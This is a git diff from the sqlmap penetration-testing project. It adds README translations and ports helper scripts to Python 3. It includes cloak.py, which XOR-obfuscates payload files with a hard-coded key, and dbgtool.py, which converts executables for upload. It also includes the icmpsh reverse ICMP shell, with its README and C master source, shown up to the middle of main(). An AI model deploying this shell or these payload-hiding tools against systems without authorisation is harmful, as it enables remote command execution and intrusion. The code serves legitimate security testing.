[burada](https://asciinema.org/a/46601) bulabilirsiniz. 
Daha fazlası için sqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduÄŸu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz + +BaÄŸlantılar +---- + +* Anasayfa: https://sqlmap.org +* İndirme baÄŸlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) veya [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues +* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki +* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demolar: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md new file mode 100644 index 00000000000..ab7814676b1 --- /dev/null +++ b/doc/translations/README-uk-UA.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap - це інÑтрумент Ð´Ð»Ñ Ñ‚ÐµÑÑ‚ÑƒÐ²Ð°Ð½Ð½Ñ Ð²Ñ€Ð°Ð·Ð»Ð¸Ð²Ð¾Ñтей з відкритим Ñирцевим кодом, Ñкий автоматизує Ð¿Ñ€Ð¾Ñ†ÐµÑ Ð²Ð¸ÑÐ²Ð»ÐµÐ½Ð½Ñ Ñ– викориÑÑ‚Ð°Ð½Ð½Ñ Ð´ÐµÑ„ÐµÐºÑ‚Ñ–Ð² SQL-ін'єкцій, а також Ð·Ð°Ñ…Ð¾Ð¿Ð»ÐµÐ½Ð½Ñ Ñерверів баз даних. Він оÑнащений потужним механізмом виÑвленнÑ, безліччю приємних функцій Ð´Ð»Ñ Ð¿Ñ€Ð¾Ñ„ÐµÑійного теÑтувальника вразливоÑтей Ñ– широким Ñпектром Ñкриптів, Ñкі Ñпрощують роботу з базами даних - від відбитка бази даних до доÑтупу до базової файлової ÑиÑтеми та Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ ÐºÐ¾Ð¼Ð°Ð½Ð´ в операційній ÑиÑтемі через out-of-band з'єднаннÑ. + +Скриншоти +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ви можете ознайомитиÑÑ Ð· [колекцією Ñкриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), Ñкі демонÑтрують деÑкі функції в wiki. + +Ð’ÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð½Ñ +---- + +Ви можете завантажити оÑтанню верÑÑ–ÑŽ tarball натиÑнувши [Ñюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або оÑтанню верÑÑ–ÑŽ zipball натиÑнувши [Ñюди](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Ðайкраще завантажити sqlmap шлÑхом ÐºÐ»Ð¾Ð½ÑƒÐ²Ð°Ð½Ð½Ñ [Git](https://github.com/sqlmapproject/sqlmap) репозиторію: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap «працює з коробки» з [Python](https://www.python.org/download/) верÑÑ–Ñ— **2.7** та **3.x** на будь-Ñкій платформі. + +ВикориÑÑ‚Ð°Ð½Ð½Ñ +---- + +Щоб отримати ÑпиÑок оÑновних опцій Ñ– перемикачів, викориÑтовуйте: + + python sqlmap.py -h + +Щоб отримати ÑпиÑок вÑÑ–Ñ… опцій Ñ– перемикачів, викориÑтовуйте: + + python sqlmap.py -hh + +Ви можете знайти приклад Ð²Ð¸ÐºÐ¾Ð½Ð°Ð½Ð½Ñ [тут](https://asciinema.org/a/46601). 
+Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾, щоб ознайомитиÑÑ Ð· можливоÑÑ‚Ñми sqlmap, ÑпиÑком підтримуваних функцій та опиÑом вÑÑ–Ñ… параметрів Ñ– перемикачів, а також прикладами, вам рекомендуєтьÑÑ ÑкориÑтатиÑÑ [інÑтрукцією кориÑтувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +ПоÑÐ¸Ð»Ð°Ð½Ð½Ñ +---- + +* ОÑновний Ñайт: https://sqlmap.org +* ЗавантаженнÑ: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ВідÑÑ‚ÐµÐ¶ÐµÐ½Ð½Ñ Ð¿Ñ€Ð¾Ð±Ð»ÐµÐ¼: https://github.com/sqlmapproject/sqlmap/issues +* ІнÑÑ‚Ñ€ÑƒÐºÑ†Ñ–Ñ ÐºÐ¾Ñ€Ð¸Ñтувача: https://github.com/sqlmapproject/sqlmap/wiki +* Поширенні Ð¿Ð¸Ñ‚Ð°Ð½Ð½Ñ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-vi-VN.md b/doc/translations/README-vi-VN.md new file mode 100644 index 00000000000..ceb2724552d --- /dev/null +++ b/doc/translations/README-vi-VN.md @@ -0,0 +1,52 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap là má»™t công cụ kiểm tra thâm nhập mã nguồn mở, nhằm tá»± động hóa quá trình phát hiện, khai thác lá»— hổng SQL injection và tiếp quản các máy chá»§ cÆ¡ sở dữ liệu. Công cụ này Ä‘i kèm vá»›i +má»™t hệ thống phát hiện mạnh mẽ, nhiá»u tính năng thích hợp cho ngưá»i kiểm tra thâm nhập (pentester) và má»™t loạt các tùy chá»n bao gồm phát hiện, truy xuất dữ liệu từ cÆ¡ sở dữ liệu, truy cập file hệ thống và thá»±c hiện các lệnh trên hệ Ä‘iá»u hành từ xa. + +Ảnh chụp màn hình +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Bạn có thể truy cập vào [bá»™ sưu tập ảnh chụp màn hình](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) - nÆ¡i trình bày má»™t số tính năng có thể tìm thấy trong wiki. + +Cài đặt +---- + + +Bạn có thể tải xuống tập tin nén tar má»›i nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc tập tin nén zip má»›i nhất bằng cách nhấp vào [đây](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Tốt hÆ¡n là bạn nên tải xuống sqlmap bằng cách clone vá» repo [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap hoạt động hiệu quả vá»›i [Python](https://www.python.org/download/) phiên bản **2.7** và **3.x** trên bất kì hệ Ä‘iá»u hành nào. + +Sá»­ dụng +---- + +Äể có được danh sách các tùy chá»n cÆ¡ bản và switch, hãy chạy: + + python sqlmap.py -h + +Äể có được danh sách tất cả các tùy chá»n và switch, hãy chạy: + + python sqlmap.py -hh + +Bạn có thể xem video demo [tại đây](https://asciinema.org/a/46601). 
+Äể có cái nhìn tổng quan vá» sqlmap, danh sách các tính năng được há»— trợ và mô tả vá» tất cả các tùy chá»n, cùng vá»›i các ví dụ, bạn nên tham khảo [hướng dẫn sá»­ dụng](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (Tiếng Anh). + +Liên kết +---- + +* Trang chá»§: https://sqlmap.org +* Tải xuống: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) hoặc [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Nguồn cấp dữ liệu RSS vá» commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Theo dõi issue: https://github.com/sqlmapproject/sqlmap/issues +* Hướng dẫn sá»­ dụng: https://github.com/sqlmapproject/sqlmap/wiki +* Các câu há»i thưá»ng gặp (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Ảnh chụp màn hình: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md new file mode 100644 index 00000000000..b065c10a0fa --- /dev/null +++ b/doc/translations/README-zh-CN.md @@ -0,0 +1,49 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap 是一款开æºçš„æ¸—逿µ‹è¯•工具,å¯ä»¥è‡ªåŠ¨åŒ–è¿›è¡ŒSQL注入的检测ã€åˆ©ç”¨ï¼Œå¹¶èƒ½æŽ¥ç®¡æ•°æ®åº“æœåŠ¡å™¨ã€‚å®ƒå…·æœ‰åŠŸèƒ½å¼ºå¤§çš„æ£€æµ‹å¼•æ“Ž,ä¸ºæ¸—é€æµ‹è¯•人员æä¾›äº†è®¸å¤šä¸“业的功能并且å¯ä»¥è¿›è¡Œç»„åˆï¼Œå…¶ä¸­åŒ…括数æ®åº“æŒ‡çº¹è¯†åˆ«ã€æ•°æ®è¯»å–和访问底层文件系统,甚至å¯ä»¥é€šè¿‡å¸¦å¤–æ•°æ®è¿žæŽ¥çš„æ–¹å¼æ‰§è¡Œç³»ç»Ÿå‘½ä»¤ã€‚ + +演示截图 +---- + +![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +ä½ å¯ä»¥æŸ¥çœ‹ wiki 上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 了解å„ç§ç”¨æ³•的示例 + +安装方法 +---- + +ä½ å¯ä»¥ç‚¹å‡» [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的æºä»£ç ï¼Œæˆ–者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的æºä»£ç . 
+ +推è直接从 [Git](https://github.com/sqlmapproject/sqlmap) ä»“åº“èŽ·å–æœ€æ–°çš„æºä»£ç : + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap å¯ä»¥è¿è¡Œåœ¨ [Python](https://www.python.org/download/) **2.7** å’Œ **3.x** 版本的任何平å°ä¸Š + +使用方法 +---- + +通过如下命令å¯ä»¥æŸ¥çœ‹åŸºæœ¬çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: + + python sqlmap.py -h + +通过如下的命令å¯ä»¥æŸ¥çœ‹æ‰€æœ‰çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: + + python sqlmap.py -hh + +ä½ å¯ä»¥ä»Ž [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还å¯ä»¥æŸ¥çœ‹ [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)ã€‚èŽ·å– sqlmap 所有支æŒçš„特性ã€å‚æ•°ã€å‘½ä»¤è¡Œé€‰é¡¹å¼€å…³åŠè¯¦ç»†çš„使用帮助。 + +链接 +---- + +* 项目主页: https://sqlmap.org +* æºä»£ç ä¸‹è½½: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitçš„ RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues +* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki +* 常è§é—®é¢˜ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/beep/beep.py b/extra/beep/beep.py index a6aacc0f630..9e1acd04b0d 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,12 +3,11 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os -import subprocess import sys import wave @@ -16,11 +15,13 @@ def beep(): try: - if subprocess.mswindows: + if sys.platform.startswith("win"): _win_wav_play(BEEP_WAV_FILENAME) - elif sys.platform == "darwin": - _mac_beep() - elif sys.platform == "linux2": + elif sys.platform.startswith("darwin"): + _mac_wav_play(BEEP_WAV_FILENAME) + elif sys.platform.startswith("cygwin"): + _cygwin_beep(BEEP_WAV_FILENAME) + elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")): _linux_wav_play(BEEP_WAV_FILENAME) else: _speaker_beep() @@ -35,9 +36,12 @@ def _speaker_beep(): except IOError: pass -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) +# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html +def _cygwin_beep(filename): + os.system("play-sound-file '%s' 2>/dev/null" % filename) + +def _mac_wav_play(filename): + os.system("afplay '%s' 2>/dev/null" % BEEP_WAV_FILENAME) def _win_wav_play(filename): import winsound @@ -45,6 
+49,10 @@ def _win_wav_play(filename): winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): + for _ in ("paplay", "aplay", "mpv", "mplayer", "play"): + if not os.system("%s '%s' 2>/dev/null" % (_, filename)): + return + import ctypes PA_STREAM_PLAYBACK = 1 @@ -54,7 +62,10 @@ def _linux_wav_play(filename): class struct_pa_sample_spec(ctypes.Structure): _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] - pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") + try: + pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") + except OSError: + return wave_file = wave.open(filename, "rb") @@ -70,7 +81,7 @@ class struct_pa_sample_spec(ctypes.Structure): raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) while True: - latency = pa.pa_simple_get_latency(pa_stream, error) + latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) if latency == -1: raise Exception("Getting latency failed") @@ -78,12 +89,12 @@ class struct_pa_sample_spec(ctypes.Structure): if not buf: break - if pa.pa_simple_write(pa_stream, buf, len(buf), error): + if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): raise Exception("Could not play file") wave_file.close() - if pa.pa_simple_drain(pa_stream, error): + if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): raise Exception("Could not simple drain") pa.pa_simple_free(pa_stream) diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index 1725f0ba8ff..641d1c51635 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,40 +3,45 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import bz2 +from __future__ import print_function + import os +import struct import sys +import zlib from optparse import OptionError from optparse import OptionParser -def hideAscii(data): - retVal = "" - for i in xrange(len(data)): - if ord(data[i]) < 128: - retVal += chr(ord(data[i]) ^ 127) - else: - retVal += data[i] +if sys.version_info >= (3, 0): + xrange = range + ord = lambda _: _ - return retVal +KEY = b"wr36EPIvaR7ZDfb4" -def cloak(inputFile): - f = open(inputFile, 'rb') - data = bz2.compress(f.read()) - f.close() +def xor(message, key): + return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) + +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() - return hideAscii(data) + return xor(zlib.compress(data), KEY) -def decloak(inputFile): - f = open(inputFile, 'rb') +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() try: - data = bz2.decompress(hideAscii(f.read())) - except: - print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile + data = zlib.decompress(xor(data, 
KEY)) + except Exception as ex: + print(ex) + print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile) sys.exit(1) finally: f.close() @@ -45,7 +50,7 @@ def decloak(inputFile): def main(): usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') + parser = OptionParser(usage=usage, version='0.2') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') @@ -57,11 +62,11 @@ def main(): if not args.inputFile: parser.error('Missing the input file, -h for help') - except (OptionError, TypeError), e: - parser.error(e) + except (OptionError, TypeError) as ex: + parser.error(ex) if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile + print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile) sys.exit(1) if not args.decrypt: diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 69114d51726..7cdb11b70c1 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,13 +3,14 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import os import sys -import struct from optparse import OptionError from optparse import OptionParser @@ -19,7 +20,7 @@ def convert(inputFile): fileSize = fileStat.st_size if fileSize > 65280: - print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile + print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile) sys.exit(1) script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) @@ -32,7 +33,7 @@ def convert(inputFile): fileContent = fp.read() for fileChar in fileContent: - unsignedFileChar = struct.unpack("B", fileChar)[0] + unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar) if unsignedFileChar != 0: counter2 += 1 @@ -59,7 +60,7 @@ def convert(inputFile): def main(inputFile, outputFile): if not os.path.isfile(inputFile): - print "ERROR: the provided input file '%s' is not a regular file" % inputFile + print("ERROR: the provided input file '%s' is not a regular file" % inputFile) sys.exit(1) script = convert(inputFile) @@ -70,7 +71,7 @@ def main(inputFile, outputFile): sys.stdout.write(script) sys.stdout.close() else: - print script + print(script) if __name__ == "__main__": usage = "%s -i [-o ]" % sys.argv[0] @@ -86,8 +87,8 @@ def main(inputFile, outputFile): if not args.inputFile: parser.error("Missing the input file, -h for help") - except (OptionError, TypeError), e: - parser.error(e) + except (OptionError, TypeError) as ex: + parser.error(ex) inputFile = args.inputFile outputFile = args.outputFile diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt index 631f9ee377f..d09e83b8552 100644 --- a/extra/icmpsh/README.txt +++ 
b/extra/icmpsh/README.txt @@ -1,45 +1,45 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! - --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. +icmpsh - simple reverse ICMP shell + +icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. + + +--- Running the Master --- + +The master is straight forward to use. There are no extra libraries required for the C version. +The Perl master however has the following dependencies: + + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP + + +When running the master, don't forget to disable ICMP replies by the OS. For example: + + sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive +commands send from the master. + + +--- Running the Slave --- + +The slave comes with a few command line options as outlined below: + + +-t host host ip address to send ping requests to. This option is mandatory! + +-r send a single test icmp request containing the string "Test1234" and then quit. + This is for testing the connection. + +-d milliseconds delay between requests in milliseconds + +-o milliseconds timeout of responses in milliseconds. If a response has not received in time, + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + The counter is set back to 0 if a response was received. + +-b num limit of blanks (unanswered icmp requests before quitting + +-s bytes maximal data buffer size in bytes + + +In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. 
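The C master in the next file computes the standard Internet checksum over the ICMP header plus payload before echoing data back. For reference, the same RFC 1071 folding logic expressed in Python (a sketch using the usual network-byte-order formulation, not a byte-for-byte port of the C routine):

    # RFC 1071 style Internet checksum: one's complement sum of 16-bit words,
    # with an odd trailing byte zero-padded and carries folded back in.
    import struct

    def internet_checksum(data):
        if len(data) % 2:
            data += b"\x00"
        total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
        total = (total >> 16) + (total & 0xFFFF)
        total += total >> 16
        return (~total) & 0xFFFF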
diff --git a/extra/icmpsh/icmpsh-m.c b/extra/icmpsh/icmpsh-m.c index 32c3edb7429..95deb603bc0 100644 --- a/extra/icmpsh/icmpsh-m.c +++ b/extra/icmpsh/icmpsh-m.c @@ -1,134 +1,134 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IN_BUF_SIZE 1024 -#define OUT_BUF_SIZE 64 - -// calculate checksum -unsigned short checksum(unsigned short *ptr, int nbytes) -{ - unsigned long sum; - unsigned short oddbyte, rs; - - sum = 0; - while(nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if(nbytes == 1) { - oddbyte = 0; - *((unsigned char *) &oddbyte) = *(u_char *)ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - rs = ~sum; - return rs; -} - -int main(int argc, char **argv) -{ - int sockfd; - int flags; - char in_buf[IN_BUF_SIZE]; - char out_buf[OUT_BUF_SIZE]; - unsigned int out_size; - int nbytes; - struct iphdr *ip; - struct icmphdr *icmp; - char *data; - struct sockaddr_in addr; - - - printf("icmpsh - master\n"); - - // create raw ICMP socket - sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); - if (sockfd == -1) { - perror("socket"); - return -1; - } - - // set stdin to non-blocking - flags = fcntl(0, F_GETFL, 0); - flags |= O_NONBLOCK; - fcntl(0, F_SETFL, flags); - - printf("running...\n"); - while(1) { - - // read data from socket - memset(in_buf, 0x00, IN_BUF_SIZE); - nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); - if (nbytes > 0) { - // get ip and icmp header and data part - ip = (struct iphdr *) in_buf; - if (nbytes > sizeof(struct iphdr)) { - nbytes -= sizeof(struct iphdr); - icmp = (struct icmphdr *) (ip + 1); - if (nbytes > sizeof(struct icmphdr)) { - nbytes -= sizeof(struct icmphdr); - data = (char *) (icmp + 1); - data[nbytes] = '\0'; - printf("%s", data); - fflush(stdout); - } - - // reuse headers - icmp->type = 0; - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = ip->saddr; - - // read data from stdin - nbytes = read(0, out_buf, OUT_BUF_SIZE); - if (nbytes > -1) { - memcpy((char *) (icmp + 1), out_buf, nbytes); - out_size = nbytes; - } else { - out_size = 0; - } - - icmp->checksum = 0x00; - icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); - - // send reply - nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); - if (nbytes == -1) { - perror("sendto"); - return -1; - } - } - } - } - - return 0; -} - +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IN_BUF_SIZE 1024 +#define OUT_BUF_SIZE 64 + +// calculate checksum +unsigned short checksum(unsigned short *ptr, int nbytes) +{ + unsigned long sum; + unsigned short oddbyte, rs; + + sum = 0; + while(nbytes > 1) { + sum += *ptr++; + nbytes -= 2; + } + + if(nbytes == 1) { + oddbyte = 0; + *((unsigned char *) &oddbyte) = *(u_char *)ptr; + sum += oddbyte; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + rs = ~sum; + return rs; +} + +int main(int argc, char **argv) +{ + int sockfd; + int flags; + char in_buf[IN_BUF_SIZE]; + char out_buf[OUT_BUF_SIZE]; + unsigned int out_size; + int nbytes; + struct iphdr *ip; + struct icmphdr *icmp; + char *data; + struct sockaddr_in addr; + + 